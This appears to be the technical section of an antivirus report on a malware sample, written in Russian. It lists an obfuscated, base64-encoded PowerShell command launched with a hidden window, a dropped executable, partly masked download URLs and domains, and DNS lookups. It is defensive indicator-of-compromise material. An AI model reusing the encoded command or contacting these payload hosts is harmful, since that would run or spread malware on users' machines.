Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAYABzAEMAUgBJAGAAcAB0AH0AIAA9ACAAJgAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBuACcALAAnAHcALQBvAGIAagBlACcALAAnAGUAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7AD...
- %TEMP%\38878.exe
- 'na###h.com.br':80
- 'na###h.com.br':443
- 'er#.lt':80
- 'ne##.com.au':80
- 'la####afilms.com':80
- http://na###h.com.br/wVZtWN/
- http://er#.lt/wUGfcJn/
- http://ne##.com.au/WZwgR/
- http://la####afilms.com/BVgUGBfots/
- 'na###h.com.br':443
- DNS ASK na###h.com.br
- DNS ASK er#.lt
- DNS ASK om####ecordings.com
- DNS ASK ne##.com.au
- DNS ASK la####afilms.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAYABzAEMAUgBJAGAAcAB0AH0AIAA9ACAAJgAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBuACcALAAnAHcALQBvAGIAagBlACcALAAnAGUAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7AD...' (со скрытым окном)